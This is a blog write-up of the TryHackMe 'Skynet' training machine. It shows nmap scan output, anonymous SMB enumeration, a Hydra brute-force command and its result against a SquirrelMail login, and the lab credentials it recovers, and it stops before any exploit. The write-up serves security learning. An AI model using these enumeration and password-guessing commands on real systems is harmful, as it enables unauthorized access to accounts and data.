u915

Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Skynet

Writeup about the Tryhackme linux machine Skynet

0 - Basic info

Linux machine

1 - Reconnaissance and enumeration

Nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄 -Pn
[sudo] password for u915: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 21:32 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|   Hosts that seem down (vulnerable):
|_    224.0.0.251
Nmap scan report for 10.10.😄
Host is up (0.036s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.😄
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.😄:80/
|     Form id: 
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_  /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   Apache httpd 2.4.18: 
|     	HTTPD:F564BBA32AA088833DA032B7EB77CA29	7.5	https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
|     	HTTPD:E74D6161229FA3D00A1783E6C3426C5D	7.5	https://vulners.com/httpd/HTTPD:E74D6161229FA3D00A1783E6C3426C5D
|     	HTTPD:C7D2DA1ACB016A5220CA8E74647BED26	7.5	https://vulners.com/httpd/HTTPD:C7D2DA1ACB016A5220CA8E74647BED26
|     	HTTPD:8F00FB1DD7567228376803FEDB0EC3B6	7.5	https://vulners.com/httpd/HTTPD:8F00FB1DD7567228376803FEDB0EC3B6
|     	HTTPD:7EEE138FD834328B3FC98E4B7FCAD266	7.5	https://vulners.com/httpd/HTTPD:7EEE138FD834328B3FC98E4B7FCAD266
|     	HTTPD:24E96D438275A8177C289509C796525C	7.5	https://vulners.com/httpd/HTTPD:24E96D438275A8177C289509C796525C
|     	HTTPD:237FAB5DE739A612077A245192137A48	7.5	https://vulners.com/httpd/HTTPD:237FAB5DE739A612077A245192137A48
|     	HTTPD:143F3A43D871E3AFFF956DB1049A6A2A	7.5	https://vulners.com/httpd/HTTPD:143F3A43D871E3AFFF956DB1049A6A2A
|     	HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4	7.5	https://vulners.com/httpd/HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	*EXPLOIT*
|     	HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9	7.2	https://vulners.com/httpd/HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9
|     	EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	7.2	https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	*EXPLOIT*
|     	1337DAY-ID-32502	7.2	https://vulners.com/zdt/1337DAY-ID-32502*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	*EXPLOIT*
|     	HTTPD:9CDB89FBD1162B1E462FDF5BEA375759	6.8	https://vulners.com/httpd/HTTPD:9CDB89FBD1162B1E462FDF5BEA375759
|     	HTTPD:13B5FCC9676077F8FD08063C83511140	6.8	https://vulners.com/httpd/HTTPD:13B5FCC9676077F8FD08063C83511140
|     	HTTPD:B057D0A07B0AC97248CE6210E08ACAF7	6.4	https://vulners.com/httpd/HTTPD:B057D0A07B0AC97248CE6210E08ACAF7
|     	HTTPD:99188FFDCAF9C4932D00C218A2E58EC7	6.4	https://vulners.com/httpd/HTTPD:99188FFDCAF9C4932D00C218A2E58EC7
|     	HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F	6.4	https://vulners.com/httpd/HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	*EXPLOIT*
|     	HTTPD:1696C4DDCBC58CE20005FCB002958C09	6.0	https://vulners.com/httpd/HTTPD:1696C4DDCBC58CE20005FCB002958C09
|     	HTTPD:BC81F521379C9038153151EAA84492CA	5.8	https://vulners.com/httpd/HTTPD:BC81F521379C9038153151EAA84492CA
|     	HTTPD:01BB9C701A4D4302EF59FA7EA89D9115	5.8	https://vulners.com/httpd/HTTPD:01BB9C701A4D4302EF59FA7EA89D9115
|     	EDB-ID:47689	5.8	https://vulners.com/exploitdb/EDB-ID:47689	*EXPLOIT*
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT*
|     	HTTPD:F292DF1CEE1729E4240D1D62A10F5D32	5.1	https://vulners.com/httpd/HTTPD:F292DF1CEE1729E4240D1D62A10F5D32
|     	HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7	5.1	https://vulners.com/httpd/HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7
|     	HTTPD:79096CA36FAE041205EFAB66A6D4EF4B	5.1	https://vulners.com/httpd/HTTPD:79096CA36FAE041205EFAB66A6D4EF4B
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	*EXPLOIT*
|     	HTTPD:E91F31FD116386F2922B3EDA4BE3899B	5.0	https://vulners.com/httpd/HTTPD:E91F31FD116386F2922B3EDA4BE3899B
|     	HTTPD:E05CACB9D575871BA1E3088D02930266	5.0	https://vulners.com/httpd/HTTPD:E05CACB9D575871BA1E3088D02930266
|     	HTTPD:D7BF4648C333C0F770A30DEB0A23601C	5.0	https://vulners.com/httpd/HTTPD:D7BF4648C333C0F770A30DEB0A23601C
|     	HTTPD:D5609C15618DCADFDAD5AD396F2B83D7	5.0	https://vulners.com/httpd/HTTPD:D5609C15618DCADFDAD5AD396F2B83D7
|     	HTTPD:D5091608B1DC5DB5CABE405261B7658E	5.0	https://vulners.com/httpd/HTTPD:D5091608B1DC5DB5CABE405261B7658E
|     	HTTPD:D26626D944F16D90B877FB157E4A128F	5.0	https://vulners.com/httpd/HTTPD:D26626D944F16D90B877FB157E4A128F
|     	HTTPD:D0D55654F7429E8A4965CBBE30779CD6	5.0	https://vulners.com/httpd/HTTPD:D0D55654F7429E8A4965CBBE30779CD6
|     	HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38	5.0	https://vulners.com/httpd/HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38
|     	HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8	5.0	https://vulners.com/httpd/HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8
|     	HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6	5.0	https://vulners.com/httpd/HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6
|     	HTTPD:A5459AF02C9EC35CE80EA173C36C3F47	5.0	https://vulners.com/httpd/HTTPD:A5459AF02C9EC35CE80EA173C36C3F47
|     	HTTPD:99477914E1BE8FA85CEA0E956232C4C2	5.0	https://vulners.com/httpd/HTTPD:99477914E1BE8FA85CEA0E956232C4C2
|     	HTTPD:824D39D8A30F1234C966CBDA41E1C446	5.0	https://vulners.com/httpd/HTTPD:824D39D8A30F1234C966CBDA41E1C446
|     	HTTPD:73656ED41609146303D488C86337BC2D	5.0	https://vulners.com/httpd/HTTPD:73656ED41609146303D488C86337BC2D
|     	HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1	5.0	https://vulners.com/httpd/HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1
|     	HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5	5.0	https://vulners.com/httpd/HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5
|     	HTTPD:4EC9662496A151DDE6D030D9127572E7	5.0	https://vulners.com/httpd/HTTPD:4EC9662496A151DDE6D030D9127572E7
|     	HTTPD:42FA2547862AB3B3F5E7F776E2D90614	5.0	https://vulners.com/httpd/HTTPD:42FA2547862AB3B3F5E7F776E2D90614
|     	HTTPD:3647863A8E4AE972669D5EE60974E777	5.0	https://vulners.com/httpd/HTTPD:3647863A8E4AE972669D5EE60974E777
|     	HTTPD:18105DABC6D0ADE97D12B90F63EAE025	5.0	https://vulners.com/httpd/HTTPD:18105DABC6D0ADE97D12B90F63EAE025
|     	HTTPD:174A0D44882BCA7E2F229BC91D6D5A09	5.0	https://vulners.com/httpd/HTTPD:174A0D44882BCA7E2F229BC91D6D5A09
|     	HTTPD:04C30566E99EFB3C0D60F08EE2524591	5.0	https://vulners.com/httpd/HTTPD:04C30566E99EFB3C0D60F08EE2524591
|     	EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7	5.0	https://vulners.com/exploitpack/EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EXPLOITPACK:2666FB0676B4B582D689921651A30355	5.0	https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355	*EXPLOIT*
|     	EDB-ID:40909	5.0	https://vulners.com/exploitdb/EDB-ID:40909	*EXPLOIT*
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
|     	1337DAY-ID-26574	5.0	https://vulners.com/zdt/1337DAY-ID-26574*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	*EXPLOIT*
|     	HTTPD:FF57290724543D4766EDDC4666992FE8	4.3	https://vulners.com/httpd/HTTPD:FF57290724543D4766EDDC4666992FE8
|     	HTTPD:F4FBBB7467F08F96828B98E753E5FE7D	4.3	https://vulners.com/httpd/HTTPD:F4FBBB7467F08F96828B98E753E5FE7D
|     	HTTPD:D94ACD37B5627A621B2D592BD44873F2	4.3	https://vulners.com/httpd/HTTPD:D94ACD37B5627A621B2D592BD44873F2
|     	HTTPD:D26FFC4C8AA598C5F130A0223836644E	4.3	https://vulners.com/httpd/HTTPD:D26FFC4C8AA598C5F130A0223836644E
|     	HTTPD:A5773ECB3CB67826707B252F21BB80BB	4.3	https://vulners.com/httpd/HTTPD:A5773ECB3CB67826707B252F21BB80BB
|     	HTTPD:86C509FC37A85DC3C01E3CE10402C6DC	4.3	https://vulners.com/httpd/HTTPD:86C509FC37A85DC3C01E3CE10402C6DC
|     	HTTPD:714A18409AEB3B8362DC4FA2B923CA7A	4.3	https://vulners.com/httpd/HTTPD:714A18409AEB3B8362DC4FA2B923CA7A
|     	HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8	4.3	https://vulners.com/httpd/HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8
|     	EDB-ID:47688	4.3	https://vulners.com/exploitdb/EDB-ID:47688	*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	HTTPD:2E568217BC35E0AA91DF49E7CE65CA67	3.5	https://vulners.com/httpd/HTTPD:2E568217BC35E0AA91DF49E7CE65CA67
|     	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
|     	PACKETSTORM:140265	0.0	https://vulners.com/packetstorm/PACKETSTORM:140265	*EXPLOIT*
|     	HTTPD:B6CF5630624F83951A477D36DC8FD634	0.0	https://vulners.com/httpd/HTTPD:B6CF5630624F83951A477D36DC8FD634
|     	HTTPD:94C27BCF50CA81A222019B9F06735AA1	0.0	https://vulners.com/httpd/HTTPD:94C27BCF50CA81A222019B9F06735AA1
|     	HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2	0.0	https://vulners.com/httpd/HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2
|     	HTTPD:7ED2E94FC8175AF57B0B84C966E78986	0.0	https://vulners.com/httpd/HTTPD:7ED2E94FC8175AF57B0B84C966E78986
|     	HTTPD:55F8C86BB4FE80544B301C6F772E1F21	0.0	https://vulners.com/httpd/HTTPD:55F8C86BB4FE80544B301C6F772E1F21
|     	HTTPD:53F7D531D201D0209EE31F3FA8829F5B	0.0	https://vulners.com/httpd/HTTPD:53F7D531D201D0209EE31F3FA8829F5B
|     	HTTPD:21A860C56B7B6A55960FB17E72B7E4B4	0.0	https://vulners.com/httpd/HTTPD:21A860C56B7B6A55960FB17E72B7E4B4
|     	EDB-ID:46676	0.0	https://vulners.com/exploitdb/EDB-ID:46676	*EXPLOIT*
|     	EDB-ID:42745	0.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	EDB-ID:40961	0.0	https://vulners.com/exploitdb/EDB-ID:40961	*EXPLOIT*
|_    	1337DAY-ID-531	0.0	https://vulners.com/zdt/1337DAY-ID-531	*EXPLOIT*
110/tcp open  pop3        Dovecot pop3d
|_sslv2-drown: 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_sslv2-drown: 
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/17%OT=22%CT=1%CU=34749%PV=Y%DS=2%DC=I%G=Y%TM=60CBA4D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=FA%TI=Z%CI=I%II=I%TS=8)OPS(O
OS:1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11N
OS:W7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R
OS:=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Network Distance: 2 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.60 seconds

Ports open 80,110,139,143,445

Port 80 is open but there is nothing useful on the index page, just an empty POST form.

<!DOCTYPE html>
<html>
	<head>
		<link rel="stylesheet" type="text/css" href="style.css">
		<link rel="shortcut icon" type="image/png" href="favicon.ico"/>
		<title>Skynet</title>
	</head>
	<body>
		<div>
			<img src="image.png"/>
			<form name="skynet" action="#" method="POST"><br>
				<input type="search" class="search"><br>
				<input type="submit" class="button" name="submit" value="Skynet Search">
				<input type="submit" class="button" name="lucky" value="I'm Feeling Lucky">
			</form>
		</div>
	</body>
</html>

Interesting path inside the port 80 /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]

A login form for squirrelmail

alt text

SquirrelMail is vulnerable to RCE but it is a RCE autheticathed. So I need to find some credentials to make it work.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

Testing the SMB port 445 with an anonymous login:

smbclient --no-pass -L //10.10.😄                                                                       1 ⨯

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

There are some shares to test, testing first the anonymous share:

smbclient --no-pass //10.10.😄/anonymous                                                                1 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 17:04:00 2020
  ..                                  D        0  Tue Sep 17 09:20:17 2019
  attention.txt                       N      163  Wed Sep 18 05:04:59 2019
  logs                                D        0  Wed Sep 18 06:42:16 2019

		9204224 blocks of size 1024. 5831108 blocks available

Downloading the txt file

get attention.txt

enumerating inside the path logs, there are 3 logs only one with content, downloading the log1.txt

get log1.txt

Looking into the files:

cat attention.txt 
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cat log1.txt     
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

So the passwords changed and probably the log file contains passwords, I can use it as a wordlist with Hydra to bruteforce the mail login form.

2 - Vulnerability Identification

Bruteforce with hydra to test my luck:

hydra -l milesdyson -P /home/u915/Escritorio/tryhackme/skynet/pass.txt 10.10.😄 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-17 22:30:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.😄:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.😄   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-17 22:30:32

Great I was lucky today, so the password for the user milesdyson is cyborg007haloterminator.

So login to the squirrel mail with the new credentials reveals an interesting mail:

alt text

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

Another password found. This time for the other share that was password protected, the personal milesdyson share.

smbclient -U milesdyson  //10.10.😄/milesdyson                                                        130 ⨯
Enter WORKGROUP\milesdyson's password: 
Try "help" to get a list of possible commands.

smb: \> ls
  .                                   D        0  Tue Sep 17 11:05:47 2019
  ..                                  D        0  Wed Sep 18 05:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 11:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 11:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 11:05:14 2019
  notes                               D        0  Tue Sep 17 11:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 11:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 11:05:14 2019

		9204224 blocks of size 1024. 5830948 blocks available

Looking inside the path notes:


smb: \notes\> ls
  .                                   D        0  Tue Sep 17 11:18:40 2019
  ..                                  D        0  Tue Sep 17 11:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 11:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 11:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 11:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 11:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 11:01:29 2019
  important.txt                       N      117  Tue Sep 17 11:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 11:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 11:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 11:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 11:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 11:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 11:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 11:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 11:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 11:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 11:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 11:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 11:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 11:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 11:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 11:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 11:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 11:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 11:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 11:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 11:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 11:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 11:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 11:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 11:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 11:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 11:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 11:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 11:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 11:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 11:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 11:01:29 2019

		9204224 blocks of size 1024. 5830948 blocks available

There is inside a relevant note, important.txt. The content is the following one:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

A new URL path is revealed: /45kra24zxs28v3yd

alt text

I enumerated the new url with Dirbuster and the medium wordlist, Dirbuster found an administration page:

Cuppa CMS:

http://10.10.😄/45kra24zxs28v3yd/administrator

alt text

The CMS is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI)

https://www.exploit-db.com/exploits/25971

3 - Exploit

SquirrelMail is vulnerable to RCE but it is a RCE autheticathed. I got the credentials but I was out of luck.

